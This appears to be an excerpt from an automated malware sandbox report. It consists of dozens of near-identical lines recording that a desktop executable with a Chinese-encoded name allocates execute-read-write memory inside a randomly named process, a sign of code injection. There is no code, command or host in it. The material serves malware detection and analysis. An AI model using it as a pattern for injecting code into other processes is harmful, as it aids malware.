        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2540000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2690000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: ED0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2110000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2160000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 810000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 820000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1200000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2EC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1150000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1160000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 25E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2640000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 680000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 810000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 820000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 8B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 8C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1260000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1270000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2080000 protect: page execute and read and writeJump to behavior
